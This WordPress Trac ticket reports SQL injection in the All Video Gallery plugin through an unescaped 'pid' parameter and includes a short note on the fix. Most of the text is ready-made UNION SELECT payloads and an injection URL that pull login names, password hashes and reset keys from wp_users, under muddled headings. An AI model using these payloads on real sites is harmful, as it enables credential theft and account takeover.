[wp-trac] [WordPress Trac] #32427: XMIL FILE FIND BUFFER/XMIL Password Reset Admin email/to get password
WordPress Trac
noreply at wordpress.org
Mon May 18 15:11:39 UTC 2015
#32427: XMIL FILE FIND BUFFER/XMIL Password Reset Admin email/to get password
----------------------------------------------+----------------------------
Reporter: Nehal227 | Owner:
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting
Component: General | Review
Severity: normal | Version: 4.1
Focuses: javascript, docs, administration | Keywords:
----------------------------------------------+----------------------------
Vulnerabilities
-1 union Select
1,2,3,4,5,6,group_concat(user_login,----,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40
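from wp_users
"SELECT * FROM ".$wpdb->prefix."allvideogallery_profiles WHERE
id=".$_pid
$_pid=$_GET['pid']
(Root cause as shown here: the pid request parameter is concatenated into the query without validation or escaping. Casting it to an integer, or building the query with $wpdb->prepare(), closes the injection. The affected file is the plugin's config.php under wp-content/plugins, not WordPress core.)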
One way the parameter is passed in:
http://{Domain_Name_Here}/wp-content/plugins/all-video-
gallery/config.php?vid=1&pid=11&pid={union Query here}
query
"SELECT * FROM ".$wpdb->prefix."allvideogallery_profiles WHERE id=-1
union Select
1,2,3,4,5,6,group_concat(user_login,0xa,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40
from wp_users
XMIL FILE FIND BUFFER
-1 union Select
1,2,3,4,5,6,group_concat(user_login,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40
from wp_users
XMIL Password Reset Admin email
-1 union Select
1,2,3,4,5,6,group_concat(user_login,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40
from wp_users
--
Ticket URL: <https://core.trac.wordpress.org/ticket/32427>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform